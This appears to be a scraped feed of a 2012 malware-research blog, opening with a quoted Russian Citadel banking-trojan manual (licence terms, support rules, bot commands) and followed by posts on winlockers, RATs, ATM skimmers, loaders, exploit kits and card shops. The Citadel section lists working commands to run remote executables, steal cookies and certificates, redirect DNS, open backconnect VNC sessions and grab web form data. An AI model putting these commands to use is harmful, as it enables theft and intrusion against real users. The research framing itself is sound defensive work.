Не экономьте на грамотной настройке сервера - это ваша инфраструктура.
У вас не работает бот?
Проверьте соответствует ли RC4 ключ в админке и в боте.
Работает ли корректно ваш крипт? Работает ли версия без крипта ?
Не присылается видео отчет? Проверьте, не стоят ли ограничения в PHP/Apache на загрузку файлов.
Вылетает ошибка Mysql: too many connections ? Проверьте, корректно ли работает ваш MYSQL-сервис на сервере, может быть он криво настроен, либо ваш сервер перегружен.
Может быть вас DDoS'ят? Смотрите куда и на что идет нагрузка, на какие скрипты. Воспользуйтесь штатными утилитами.
Пытаетесь запустить на VmWare и у вас не работает бот? Проверьте вашу внимательность, случаем, не русская ли это версия образа винды?
Не работает VNC гейт? Смотрите, работает ли PHP вообще на Windows-сервере, и правильно ли он настроен VNC-коннектор.
Оцените субъективно вашу внимательность к деталям, уверенность в действиях и логические шаги и приступайте к тестированию. Не бойтесь экспериментировать, ничего не сломается. Что-то внедрили? Протестите сначала на себе и на малом количестве ботов, прежде чем внести в работу.
Сначала протестируйте, потом пишите в саппорт. Не надо писать "у меня не работает что-то..." дайте знать сразу условия: что вы делали, как вы делали, где вы делали, что произошло, что не произошло, что должно произойти. Как можно больше информации в 1 сообщении! Представьте, что вы даете показания и описываете ВСЕ МЕЛЬЧАЙШИЕ ДЕТАЛИ.
Например: "У меня не работает VNC, запускаю бота на вмваре - отстукивает в основную админку. Даю команду на выполнение соединения уже в VNC админке - дальше ничего не происходит, проверил работает ли вообще Windows-сервер: тут у меня возникли сомнения, т.к отображается содержимое php-файлов в браузере, что может быть?"
Помните: правильно сформулированный вопрос - половина правильного ответа.
Клиентов становится больше, а саппорт один, поэтому каждый должен соблюдать нижеприведенные условия!
Озвучу несколько важных правил, при обращении к саппорту:
1) Никогда не пишите "привет? как дела?", из этой же серии "ты тут?", эти вопросы всегда останутся без ответа. Пишите сразу ваш вопрос/предложение/баг ОДНИМ сообщением, прилагайте как можно больше информации: что делаете, как делаете, какой результат, что хотелось бы получить.
2) Пишите с того же Jabber'a, с которого делали заказ продукта, никаких саппортов, доверенных лиц и т.п мы не принимаем к общению, если вы их не указали заранее при покупке.
3) Пожалейте наши глаза, не пишите по возможности TRANSLITOM - скорость считывания информация и ее усваивание снижается в разы!
4) Не долбите вопросами "когда будет апдейт?", "когда уже выдашь?", "когда будет это?" - если вы что-то заказали или разместили заявку, значит мы непременно на нее ответим и выдадим вам что нужно, т.к все записано. У саппорта есть свои приоритеты на разные типы заявок, если мы что-то задерживаем, значит оно так надо, это может быть дополнительное тестирование, багфикс и т.п
5) Не стоит задавать откровенно глупые вопросы, на которые вы можете найти ответ потратив 5 минут поиска в гугле, либо спросив у коллег по цеху на форуме. Вопросы в стиле "как закачать файлы на сервер", "почему не работает домен", "как выставить права" и т.п остаются без внимания.
6) Чем больше вы даете информации по проблеме, тем качественнее и доступнее вы получите ответ.
7) На вопросы когда будет апдейт, когда выдадут покупку и т.п саппорт НЕ отвечает, если вы подали заявку на что-то, она будет обработана в ближайшее время и мы про нее не забыли. Подобными вопросами будете только действовать на нервы и мешать доработке.
Срок обработки, если вы хотите купить новый модуль от 3 до 72 часов. В связи с большим количеством разных заявок (смена железа, докупка модулей, покупка лицензии, перевязка партнеру...) все заявки на получение чего либо(например купленного модуля) будут обрабатываться от 3 часов до 72 часов.
Убедительная просьба не спрашивать и не задавать вопросы, когда что-то будет или появится, не писать каждые 5 минут "как там дела? когда уже выдашь покупку?" - этим вы никак не ускорите процесс выдачи, а только будете отвлекать от работы и саппорта и кодера. Все заявки собираются в течении 1-3 дней и комплекты отдаются разом в одно время всем, никаких "мне как можно скорее" быть теперь не может.
8) Не спрашивайте когда выдет новая версия т.к разработка своим ходом и как только появится новая версия, мы вам обязательно сообщим, если вы наш клиент.

********************************************************************************
==========================>>>>> 22. Лицензионное соглашение и правила использования
********************************************************************************
1. Приобретая продукт Citadel, вся ответственность за его использование лежит на вас. Команда разработчиков Citadel Software не несет ответственности за любые неправомерные действия с использованием данного ПО. Софт предназначен для тестирования корпоративной политики безопасности внутри частных компаний.
2. Команда разработчиков Citadel Software категорически не поддерживают использование данного продукта на территории СНГ, продукт не будет работать на системах, с русскоязычной и украинской раскладкой.
3. После согласования условий в момент покупки и передачи денежных средств разработчику, данные средства не могут быть более возвращены клиенту обратно.
4. Перед покупкой, клиент обязуется ознакомиться с полным описанием продукта и его функционалом, при имеющихся вопросах, обратиться в тех.поддержку.
5. Клиент обязуетеся использовать персональный билдер на 1 компьютере и не передавать его третьим лицам, персональный билдер имеет уникальную сигнатуру, принадлежащую только вам. Все остальные вопросы по данному вопросу оговариваются в личной беседе. Барыжнечество/перепродажа без согласия автора наказуемы black list'ом и лишением лицензии.
6. Клиент обязуетеся ежемесячно вносить арендную плату, установленную разработчиками. Максимальный срок просрочки - 10 дней. Если сумма поддержка не была внесена, ваш аккаунт блокируется в Citadel CRM и вы лишаетесь всех дальнейших обновлений продукта на 1-3 месяца (решается индвидуально).
7. Стоимость поддержки определяется разработчиками и на данный момент составляет $125.00 LR, в эту стоимость входит финансирование дальнейшей разработки продукта, плановые чистки и мотивация кодеров работать дальше над проектом. В эту стоимость не входит сервис или качество услуг по поддержке клиентов. Поддержка осуществляется "as is". Софт изначально расчитан на тех, кто ранее работал с подобными программами и ботами, если у вас нет опыта - мы ничем не сможем помочь, у вас возникнет большое количество вопросов, на которые у нас нет времени отвечать.
8. Любые вопросы/замеченые ошибки в софте/недочеты/идеи, принимаются через ticket-панель в вашем персональном аккаунте Citadel CRM.
9. Клиенту выдается аккаунт в системе Citadel CRM, данный аккаунт принадлежит исключительно клиенту и передача его третьим лицам запрещена.
10. Клиент имеет право передать или продать свою лицензию на продукт, предварительно согласовав свои действия с разработчиками, после прохождения определенной верификации нового владельца, права на лицензию будут переоформлены. За перепродажу лицензии взымается комиссия в размере $500.00
11. Команда разработчиков Citadel Software не несет ответственности за обнаружение продукта в различных антивирусных системах, но в свою очередь старается этого недопускать и делать все необходимое для избежания этого.
12. Все операции с денежными средствами осуществляются исключительно через платежную систему Liberty Reserve, другие платежные инструменты недопускаются к использованию. Оперативно обменять средства из различных платежных систем, можно на сайте mmgp.ru
13. Дополнительные модули для продукта Citadel можно приобрести в любое время.
14. В случае неразрешения споров по поводу корректной работы функционала софта, клиент обязуется предоставить доступ к ПК, где установлен тестовой бот или вебсервер support'у, в противном случае support не сможет оказать помощь в данном вопросе.
15. В задачи тех.поддержки не входит установка и настройка софта на сервере/серверах клиента, клиент обязуется сам установить или настроить необходимое ПО на сервере, либо привлечь соответствующих специалистов, а также протестировать корректную работу ПО. Установка и настройка продукта тех.поддержкой осуществляется за доп.плату.
16. Citadel не продается англоязычной публике (амеры, румыны, азиаты, любой англоговорящий человек), запрещено быть представителями данных субъектов и обслуживать их интересы(читать: быть посредником), за несоблюдение данного правила следует лишение лицензии и создание BLACK LIST'a за жесткое нарушение правил.
Софт предназначен только для русскогоязычной публики.
17. Запрещено организовывать сервисы по продаже разовых "билдов" Citadel, а также продавать доступ к своему ботнету или сдавать его в аренду третьим лицам. За любое выявление данного факта на форумах, будет вынесено предупреждение, повторное нарушение приведет к лишении лицензии.
18. Выдача любых покупок(новых модулей), обновлений, скриптов, комплектов и т.п занимает от 3 до 72 часов с момента подачи заявки, просьба не флудить вопросами "когда уже выдашь что-то?" или "можно мне поскорее"
19. Если при сборке ехе-билда, билдер выдает ошибку "ERROR: Source executable file corrupted." значит вы сменили железо или программную среду(виртуальную машину) и привязка билдера просто слетела. Не рекомендуется ставить билдер на виртуальные машины, которые переносятся с PC на другой PC и компьтеры/серверы которые нестабильно работают.
Купите самый дешевый нетбук для билдера или VPS с Windows и поставьте туда, чтобы там стоял надежно ваш билдер долгое время. Т.к возможны проблемы с привязкой, если пользуетесь такими утилитами как CCTools или любыми другими, которые меняют mac-адреса, параметры системы и т.п
20. В связи с большим количеством вопросов support'у в jabber и в CRM, мы не гарантируем найти решение или ответ на ваш вопрос. Большинство вопросов связанных с настройкой сервера или apache/php вы можете найти в Google. Вопросы, которые обсуждали много раз, вы можете найти на форумах, CRM или спросить у коллег, кто сможет вам помочь. Просьба задавать вопросы, только если вы действительно считаете ваш вопрос серьезным и важным.
21. При попадании вашей админки или комплекта(скриншоты, описания, тексты, доступы) в паблик по вашей вине(даже если вы были взломаны), вы сразу лишаетесь лицензии. Также как и при обнаружении вашего комплекта у третьих лиц,в т.ч на различных форумах. Ответственность за сохранность комплекта несете только вы. Удаляйте архивы и файлы с файлообменников и серверов своевременно.
********************************************************************************
==========================>>>>> 23. Список команд для бота
********************************************************************************
Работы с OC.
os_shutdown - Выключить компьютер
os_reboot - Перегрузить компьютер
Работа с ботом.
bot_uninstall - Выгрузить бота с компьютера
bot_update [url] - Обновить конфигурационный файл бота
- - - - - - - - - - - - - - - - - -- - - - - - - - -- - - - - - - - -- - - - - - - - -
Работа с VNC:
bot_bc_add [service] [ip] [port] - Создать бек-коннект соединение с ботом через Win VNC-коннектор.
bot_bc_remove [service] [ip] [port] - Удалить бек-коннект соеднение с ботом через Win VNC-коннектор.
Пример работы ручных команд, если вы не покупали модуль VNC:
bot_bc_add socks XXX.XXX.XXX.XXX XXXXX
bot_bc_add vnc XXX.XXX.XXX.XXX XXXXX
Здесь должны быть указаны данные Windows VNC-коннектора, для этого на сервере запускаем утилиту из архива server\cbcs.exe
Citadel Backconnect Server 1.2.0.0.
Build time: 10:00:43 25.01.2012 GMT.
Usage: cbcs.exe <command> -<switch 1> -<switch N>
listen Start a backconnect server for one bot.
-nologo Suppresses display of sign-on banner.
-ipv4 Listen on IPv4 port.
-ipv6 Listen on IPv6 port.
-bp:[port] TCP port for accepting a connection from bot.
-cp:[port] TCP port for accepting a connection from сlient.

CONSOLE> cbcs.exe listen -cp:1111 -bp:2222
Citadel Backconnect Server 1.2.0.0.
Build time: 10:00:43 25.01.2012 GMT.
Listening on IPv4 port 2222.
Listening on IPv4 port 1111.
Press Ctrl+C key to shutdown server.
Waiting for incoming connections (port of bot: 2222, port of client: 1111)...
И таким образом даем команду боту bot_bc_add vnc XXX.XXX.XXX.XXX 2222
-bp порт указывается в команде в админке.
Мы же коннектимся на Win VNC-коннектор посредством любого VNC-клиента либо SOCKS'офикатора.
- - - - - - - - -- - - - - - - - -- - - - - - - - -- - - - - - - - -- - - - - - - - -
bot_httpinject_disable [url_mask] - Отключить выполнение инжекта у бота
bot_httpinject_enable [url_mask] - Включить выполнение инжекта у бота
Работа с пользователем.
user_destroy - Убить ОСь бота (если есть привилегии)
user_logoff - Завершить сеанс пользователя бота
user_execute [url] - Запустить исполняемый файл на компьютере бота
user_cookies_get - Получить куки с компьютера бота
user_cookies_remove - Удалить куки с компьютера бота
user_certs_get - Получить сертификаты с компьютера бота. Пароль на сертификаты: pass
user_certs_remove - Удалить сертификаты с компьютера бота
user_url_block [url_mask] - Заблокировать URL
user_url_unblock [url_mask] - Разблокировать URL
user_homepage_set [url] - Задать URL как домашнюю страницу боту
user_flashplayer_get - Получить SOL файлы с компьютера бота
user_flashplayer_remove - Удалить SOL файлы с компьютера бота
dns_filter_add <host> <ip> - добавление маски для редиректа
dns_filter_add *microsoft.com* 127.0.0.1 - добавление маски для редиректа
dns_filter_remove *microsoft.com* - удаление маски для редиректа
dns_filter_remove <host> при удалении должен быть указан такой же хост как и при добавлении
url_open http://www.host.com
Открываем на компьютере холдера произвольную заданную страницу дефлотовым браузером на полный экран, идеально для рекламы чего-либо

user_execute http://www.citadel-host.com/file.exe
Команда, которая позволяет запускать произвольные ехе-файлы.

user_execute http://www.citadel-host.com/file.exe -f
Команда, которая позволяет перезаписать текущую версию Citadel на болеее новую(благодаря флагу -f), при условии, что encryption_key в конфиге совпадает.

Дополнительные параметры cекции WebFilters
Два новых параметра: P и G.
Параметр P указанным перед ссылкой, указывает о записи только POST запросов(все другие игнорируются) с этой ссылки.
Параметр G указывает о записи только GET запросов (все другие игнорируются) с заданной ссылки.
Параметр ! игнорирует заданные запросы по маске и не пропускает их в логи.
Examples:
"Phttp://*.com/" - грабит только все пост-запросы в http://. https:// игнорирует
"Ghttp://*.eu/*banking*" - грабит только все GET запросы по заданной маске.
"Phttps://*.com/" - грабит только https://-post запросы
"!http://*.com/*.jpg" - игнор jpg картинок.

Like i've already told on many e-mails, i'm not really into Citadel tracking, if you want more, i think you should follow Kafeine works, he seem passionate like i was for SpyEye.

PS: Congratulation Aquabox for your 'rain edition' released since one week, it took me just one LinkedIn Spam to get my attention and get the package (and i'm just a simple guys, not from AV business)
"You can run but you can't hide" researchers will always have your crapwares sooner or later.
 

Sh*t happens

October 21, 2012, 5:33 pm
$
0
0
So, what's happend ?
Shit.
Like i've says on my previous article "researchers will always have your crapwares sooner or later"
Now a builder was leaked ¬.¬

Not the latest but...

And about Citadel...

With a crappy exploit


Unknown shit still in brute force with htaccess claiming "Auth to RSS-Feed"

And a log parser (again the same) used by bot-herders to parse Citadel logs.

Search:

Search bots:

Cards:

Stats:

URL Stats:

Mails:
Delete not unique (if ERROR memory limit - download tmp file and filter manual.)

Options:

Anyway there will be no inpact about the leak
 I've already explained why before.
PS: i've not looked if it's really original builder or a fake.

Silence Winlocker 5.0

October 25, 2012, 5:32 am
$
0
0
 Having a look on a version who play MP3 file.

Now let's start the boring part (reversing)
At first it call the time service dept and retrieve the date and check it with 29 Oct
(I've passed on some part of the code)
It's a protection inside Silence Winlocker, the bad guys have 7 days to f*ck ppl with his bin, after the bin will not work and should buy a new one.

Kill process:

Add a startup key:

Load from ressource an MP3 file:

And about ressource there is even one picture

Call the C&C:

Remove some entry in registry:

Kill taskmgr if found:

Play the MP3 file:
md5: 819be88d910d97bb06e02bc255977999

Call the C&C for picture:


And here we go

The C&C look's like this:

Main:

Number of connections:

Payement:

You have 72 hours to pay the fine!

Tring with a 'working' MoneyPak code

Wait! Your request is processed within 24 hours.

Code appeared on the panel:

DA:

Files:


The latest version of Silent Winlocker (5.0) have not changed alot, they replaced the fbi sound by webcam feature after... it's still the same crap who do same things.

thread:

kill proc:

Startup:

Call the gate:

lol'd:

Landing fail:

It should look's like this:

Main:

Number of connections:

Ukash/PSC/MoneyPak Payment:

Picture:


Panel files

picture.php:

CameraExample.swf:




Also got the Citadel HID calculator
I lol'd of guys who cry 'Citadel leak is fake'
ppl dont know that the protection message is 'CORRUPTED EXE SHIT'


BackDoor-ARD/BackDoor.Feardoor

November 3, 2012, 3:12 pm
$
0
0
Old school malwares are fun especialy 'Acid Drop' a RAT not complicated to use
I've found it by error when i was searching another threat, you can find a description of Acid Drop here: http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=114534
Know as 'BackDoor-ARD' by McAfee, Acid Drop is written in Visual Basic and need MSCOMCTL, MSWINSCK and TABCTL32 to run properly (the joy of vb6).

The Client i've found was packed by PECompact.

 And several weird strings appeared:


Acid Drop seem ripped from 'Fear Client'
So i've searched on Internet and i've found 'Satan' (Another rip?)

Both are similar (Hi Richard):

The two clients have exactly the same features and GUI:

 Fun tab:

On Satan, the 'matrix' feature seem badly coded
'blackoutoff' appear on dialog without typing it, it's a function inside to remove the black screen after seconds, but bugged.
Acid Drop seem don't have this problem.

Explorer tab:

Info tab:

The 'server.exe' work both for Acid Drop and Satan Client.

Acid Drop MD5: 210712b6923aea4212f4e4bcb47b44aa
Satan MD5: 0f71dc45e3e506553dd4959712a7be9c
Server MD5: 3135c6526e3ca1c1e9b340a3ffb30fa0

Acid Drop compilation timedatestamp: 2004-04-14 20:37:50
Satan compilation timedatestamp: 2002-01-04 21:16:54
Server compilation timedatestamp: 2002-01-04 21:17:23

But there is a problem with Satan:
"Released: May 20 2004"

The description of BackDoor-ARD on McAfee website was added the 2004-04-20 and they don't speak of Satan,  the signature was added the 2003-03-19 on McAfee engine, so if we refers to the timestamp Satan was undetected by McAfee for 1 year ?

The server don't have registry persistence and the process can be simply killed with task manager.
It's really a simple RAT, that can be the cause on why McAfee set time.

What's others guys says on FearDroor ?
Paretologic:
C'mon damage level and distribution are low.

spywareviruscleaner.com (affiliate site for PCSafeDoctor)
Total bullshit, and what the fuck is XTray.exe ?

Symantec was more fast to detect it

And who are the bad guys who still don't detect Feardoor ?
According to VirusTotal we have 6 winners.
• ByteHero
• CAT-QuickHeal
• eSafe
• SUPERAntiSpyware
• TotalDefense

For SUPERAntiSpyware you can read this on the footer of the official website:
 The threat is probably too old for them, for others companies i don't know.
They have not added a date when they started and i'm bored to search.

Connection to the server using the port 8811

When the server receive a command

The received command here is 'www www.acid-alchemy.com' for a webpage popup try.

The command is parsed to get just 'www'

And compared to other know commands to find the action to do

List of commands:

Yes, it's a good example of 'hard-coded' RAT
StrCmp.. StrCmp everywhere.

And when it finaly get it, the command is parsed again but this time to get URL

The sub-routine just do 'open URL' with shellexecuteA, a vb6 classic.

Acid Drop source code was probably released



On web-archive we can found some captures of acid-alchemy.com
A leet NukedKlan CMS and a lot of Yahoo booters.

Fu*$#ing pi*% news:

Ho no... McAfee and some others identify the trojan.

WhAt ThE f^¤cK

Hackerz-inc was pretty simple:

I miss the 2004 keyboard cowboys.

Knucker.C/LoveLetter

November 4, 2012, 7:53 am
$
0
0
A lame vb script found on Facebook.


Fun to see how AV fails on this. (5/44 According to VT)
https://www.virustotal.com/file/5548e4e1cc6da289f881b749669fe7b2372b3ad296c803344780738e09a896b8/analysis/1350751378/


Now we are 2 weeks later and... 12/44

Several facebook crap are on kamasms.fr

Fake 'Hack Facebook' program, but to get it you need to call a number.

A story of iframes

Fake testimonials:

Facebook craps still have good days.

Two days ago a friend got infected with a fake facebook hacktool binded with Password stealers and Ardamax keylogger, he got it from a fake facebook group

Social engineering will always work.

Fake French administrative documents

November 4, 2012, 9:26 am
$
0
0
Fake documents are a plague in France.
On internet you can easily contact someone to make fake documents (driver license, french national id, utility bill etc...)
You can even found 'how to' if you know the good places, example here with a tutorial to make realistic fakes euro:

Making counterfeit money is a hard task especially with euro currency.
Most of French counterfeiters do fake documents instead of euro, example here, 'pUre Shop' Fake docs and even botnet installation
French National ID Scan: 15€
Physical fake: 400€
Price negotiated for custom request.

On the same underground community, 'Hacker57000' sells stolen French national ID/Driver license/Cheques/Credit cards:


Someone even sell PSD (photoshop file) of fake driving license and French National ID:

Another guys on the same forum selling fake French National ID:

But you don't have to know some underground forums to find a forger, they are everywhere even on video platforms like YouTube and Dailymotion.

5 mins after reporting videos as inappropriate, they was removed. (and a sunday, nice shot dailymotion!)

On YouTube they even explain 'how to'

I've found some PSDs used by these guys.
French driver license:

Identity card:

Electricity bill:

Degree:
And more and more...

I don't really know how they operate to reproduct security elements but programs like Cerberus and REPRINTStudio can help.
GuardSoft are not involved into documents forgery and i don't want make them a bad reputation, but a bad use of their programs can probably help criminals.

'GuardSoft' was used on the past as name for a FakeAV (nothing related with the software company)

For information, making and using fake administrative documents (identity cards, certificates of nationality, passports, etc.) is punishable by five years in prison and/or a €80,000 fine in France.

And for those who still haven't seen "Encore + d'action Arnaques aux faux papiers : révélations sur un scandale" go have a look :)




Search

W32/PixSteal.A

November 4, 2012, 1:08 pm
$
0
0
Another weird malware...
It stealing images (JPG, .JPEG, and .DMP files.) in the infected drive then send it to a remote FTP server.
If you want more infos: http://about-threats.trendmicro.com/us/malware/TSPY_PIXSTEAL.A



 The grabbed images could be used in various cyber crimes, black mailing, identity theft and maybe for future attacks.

And yeah, there is a lot of stuff on the FTP...

Troj/Skimer-A

November 6, 2012, 2:24 am
$
0
0
Sophos guys published an article in 2009 about a malware who target Diebold ATM:
http://nakedsecurity.sophos.com/2009/03/17/credit-card-skimming-malware-targeting-atms/
http://nakedsecurity.sophos.com/2009/03/17/malware-lurking-atm/
http://nakedsecurity.sophos.com/2009/03/18/details-diebold-atm-trojan-horse-case/

The sample was requested on kernelmode since august and i wanted to have a look but that was not my priority to talk about this.
There is something wrong with the compilation timedatestamp of the malware: 1992-06-19 - 22:22:17

File infos and programming language used

Russian carders looking for Diebold programming guide:


 Apparently this documents (Agilis 91x EMV User and Programmer Guide) was leaked:
This type of leak can help carders to develops malware against ATM but according to Vanja Svajcer, for Troj/Skimer-A, the coder used undocumented Diebold Agilis 91x functions.
(And i've read the Diebold document to compare stuff used inside the malware and described in the PDF but nothing really helped me)

After for accessing physicaly to ATM and load the malware... i don't know but i've found people who buy ATM drives, so i think with money and corruption of a privileged insider it's not really a problem.
 
Dialog:

Send command to the ATM:

Save logs ?

 Hooks API from DbdDevAPI.dll to manipulate the ATM ?

Targeted GetProcAddress to retrieve functions

Injects a thread in "mu.exe" process


Create 2 threads:

Establish a connection to the service control manager and do operations on lsass.exe

Shutdown the atm

Request a password and if correct do operations on the ATM (probably a security made by the coder)
1..4 - Dispense cassete
9 - Uninstall
0 - Exit
http://diebolddirect.com/atm-supplies-atm-cassettes.aspx

Requesting a password:

Get the ATM version:

Agent, transactions, cards, keys numbers:

Probably a part of the code used to parse transactions in Ukrainian, Russian and US currencies if i refer to the Vanja Svajcer article.

Print receipt:

From what is see the malware can dispense cash, print logs, shutdown the atm, get the ATM version and uninstall itself.
It's a sophisticated piece and unusual, i've not fully understand what's he do (i'm really bad at dead-listing)
Debugging this one from a compromised Diebold will surely don't cause me these problems, but anyway that the first time i see a malware like this.




Backdoor.Nucleroot/Win32.Umbald.A (Umbra Loader)

November 11, 2012, 8:34 am
$
0
0
Almost FUD, detected by NOD32 and Kaspersky. (2/44)

Crypted with a dirty DotNet crap

Once unpacked it's another story (33/44)

Read the ressources DLL0/1/2 and CFG

Get the config.

Do some registry shit, parse the config url get the pc name...

Call the gate.

Furtivity fail:



Wait order:

Call the gate each 2 minute for order

Order:


Retrieve and execute:

Return mode=3 to says order is done

Task complete.

Umbra thread:

Login:

Dashboard:

Start:

File upload:

Install:

Bots:

Commands:

Country statistics:

Cpanel:

Botnet hosted on reliahost.net, they are know for hosting malwares, warez and porn.

ReliaHost website:

Unbra Loader builder:
Builder MD5: 91eda4acfb9da021d4f7b91e780b12be

Nano Wincor Skimmer

November 11, 2012, 8:34 am
$
0
0
Found on a forum.
"Used 3 times, sold as unnecessary"




DUMPSLOGS.COM Card shop

November 16, 2012, 12:22 am
$
0
0
Found this one on scan4you

• dns: 1 ›› ip: 84.22.106.86 - adresse: DUMPSLOGS.COM
Domain Name:    DUMPLOGS.COM
Registrar:  BIZCN.COM, INC.
Whois Server:   whois.bizcn.com
Referral URL:   http://www.bizcn.com
Name Server:    NS3.CNMSN.COM
Name Server:    NS4.CNMSN.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date:   09-nov-2012
Creation Date:  09-nov-2012
Expiration Date:    09-nov-2013


Login:

News:

Dumps:

Cards:

Bank account:

Others:

Cart:

My items:

Checker:

Was down... and mins later, the news page modified:

Add funds:

Change password:

Ticket system:

/admin/
Not sure if it's CMS related there is a gate.php inside /admin/

Epubb winlock affiliate

November 16, 2012, 2:57 am

Serenity Exploit Kit

November 16, 2012, 8:13 am
$
0
0
Says hello to another (lame) kit...
Coded by 'Oakley' the advert look like a HF crap:

We got warned hours later by MDL on Twitter

The kit itself is pretty lame and vulnerable (lol, what an irony), Malekal took some screenshot from the inside with a lame tricks.
http://www.malekal.com/2012/11/16/en-serenity-exploit-pack/


Happy customer:


Quick view of the folders:
• dns: 1 ›› ip: 109.163.231.250 - adresse: WINAMPGROUP.CO.UK
hxxp://winampgroup.co.uk/k0ff/index.php?s=ag
hxxp://winampgroup.co.uk/k0ff/get.php
hxxp://winampgroup.co.uk/k0ff/files/GeoIP.dat
hxxp://winampgroup.co.uk/k0ff/files/cfg.php
hxxp://winampgroup.co.uk/k0ff/files/connectdb.php
hxxp://winampgroup.co.uk/k0ff/files/funcs.php
hxxp://winampgroup.co.uk/k0ff/files/geoip.php
hxxp://winampgroup.co.uk/k0ff/files/heaplib.js
hxxp://winampgroup.co.uk/k0ff/files/js.php
hxxp://winampgroup.co.uk/k0ff/files/load/combo.jar
hxxp://winampgroup.co.uk/k0ff/files/load/ie.html
hxxp://winampgroup.co.uk/k0ff/files/load/ie.php
hxxp://winampgroup.co.uk/k0ff/files/load/ie2.php
hxxp://winampgroup.co.uk/k0ff/files/load/libt.php
hxxp://winampgroup.co.uk/k0ff/files/load/libtiffurl.php
hxxp://winampgroup.co.uk/k0ff/files/load/midi.php
hxxp://winampgroup.co.uk/k0ff/files/load/php_errors.log
hxxp://winampgroup.co.uk/k0ff/files/load/time2.php
hxxp://winampgroup.co.uk/k0ff/files/load/xml.php
hxxp://winampgroup.co.uk/k0ff/files/load/_notes/dwsync.xml
hxxp://winampgroup.co.uk/k0ff/files/s/ag.exe
hxxp://winampgroup.co.uk/k0ff/files/s/default.exe
hxxp://winampgroup.co.uk/k0ff/files/s/st.exe
hxxp://winampgroup.co.uk/k0ff/files/s/_notes/dwsync.xml
hxxp://winampgroup.co.uk/k0ff/spl/chrome.php
hxxp://winampgroup.co.uk/k0ff/spl/ff.php
hxxp://winampgroup.co.uk/k0ff/spl/ie.php
hxxp://winampgroup.co.uk/k0ff/spl/opera.php
hxxp://winampgroup.co.uk/k0ff/spl/safari.php
hxxp://winampgroup.co.uk/k0ff/admin/login.php
hxxp://winampgroup.co.uk/k0ff/admin/links.php
hxxp://winampgroup.co.uk/k0ff/admin/stats.php
hxxp://winampgroup.co.uk/k0ff/admin/checklogin.php
hxxp://winampgroup.co.uk/k0ff/admin/exe.php
hxxp://winampgroup.co.uk/k0ff/admin/filterTable.js
hxxp://winampgroup.co.uk/k0ff/admin/logout.php
hxxp://winampgroup.co.uk/k0ff/admin/images/Serenity.png
hxxp://winampgroup.co.uk/k0ff/admin/images/b-l.png
hxxp://winampgroup.co.uk/k0ff/admin/images/b-r.png
hxxp://winampgroup.co.uk/k0ff/admin/images/bambooimg.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/bg.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/bottom-left.png
hxxp://winampgroup.co.uk/k0ff/admin/images/bottom-right.png
hxxp://winampgroup.co.uk/k0ff/admin/images/dv1.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/dv2.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/dv3.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/footer.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/footer.png
hxxp://winampgroup.co.uk/k0ff/admin/images/header.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/ico_auth.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/ico_cat.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/ico_comment.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/ico_link.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/inp_login.gif
hxxp://winampgroup.co.uk/k0ff/admin/images/left.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/loginbox_bg.png
hxxp://winampgroup.co.uk/k0ff/admin/images/menu1.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/menu2.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/menu3.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/pagebg.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/sidetop.png
hxxp://winampgroup.co.uk/k0ff/admin/images/spacer.gif
hxxp://winampgroup.co.uk/k0ff/admin/images/submit_login.gif
hxxp://winampgroup.co.uk/k0ff/admin/images/t-l.png
hxxp://winampgroup.co.uk/k0ff/admin/images/t-r.png
hxxp://winampgroup.co.uk/k0ff/admin/images/top-left.png
hxxp://winampgroup.co.uk/k0ff/admin/images/top-right.png
hxxp://winampgroup.co.uk/k0ff/admin/images/top.jpg
hxxp://winampgroup.co.uk/k0ff/admin/images/_notes/dwsync.xml

A month ago on the same private forum, a new exploit kit appeared named 'AlphaPack'

Picture:


Even this thread have turned on HF faggotry
(Funny things it's they flame hackforum inside, the admin have even started a thread to make them stop this shit)

As i see from AlphaPack there is Metasploit behind.
When 46.17.102.83/adutaiml/adm/login.php was up i've got a quick view but take no screenshots and shits... sorry guys :)
I've just took note of these folders...
hxxp://46.17.102.83/adutaiml/adm/img/
hxxp://46.17.102.83/adutaiml/adm/css/
hxxp://46.17.102.83/adutaiml/adm/js/
hxxp://46.17.102.83/adutaiml/adm/conf/
hxxp://46.17.102.83/adutaiml/adm/package/
hxxp://46.17.102.83/adutaiml/adm/classes/
hxxp://46.17.102.83/adutaiml/adm/package/alphaPWN/
hxxp://46.17.102.83/adutaiml/exp/data/profiles/1/os/

Kahu Security and others exploit pack guys will probably investigate these new craps better.

Ah and about the malware loaded on the Serenity Kit, for the love of god.. stop using lame hf crypters who execute the decrypted copy from memory, it's dumpable in two mins.

Edit:
For thoses who wonder what's the payload it's Tofsee.F (a spam and traffic relay)
Unpacked:
Both are on kernelmode.info if you look for files.
And for more info Unixfreakjp have did investigation on the file: https://dl.dropbox.com/u/32230830/MalwareMustDie-20121117-01.txt
Looks like they have problem with their urls: http://host-tracker.com/check_res_ajx/11605033-0/
Edit 2: http://www.youtube.com/watch?v=2AtB9g5zjsg
Search

vksh0p.com card shop

November 19, 2012, 3:42 pm
$
0
0
Found via spam, "wlecome"

• dns: 1 ›› ip: 37.221.166.121 - adresse: VKSH0P.COM
Domain Name: VKSH0P.COM
Registrar: BIZCN.COM, INC.
Whois Server: whois.bizcn.com
Referral URL: http://www.bizcn.com
Name Server: NS1.FREEDNS.WS
Name Server: NS2.FREEDNS.WS
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 07-oct-2012
Creation Date: 07-oct-2012
Expiration Date: 07-oct-2013


Login:

News:

Buy stuff:

"Payapl"

Support:

My stuff:

Add credit:

Change pass:

Admin:

Barracuda Loader

November 19, 2012, 3:43 pm
$
0
0
Advert:

Login:

Dashboard:

Bots:

Commands:

Access logs:

Logs:

Settings:

There is also some faggotry like Micro Worm
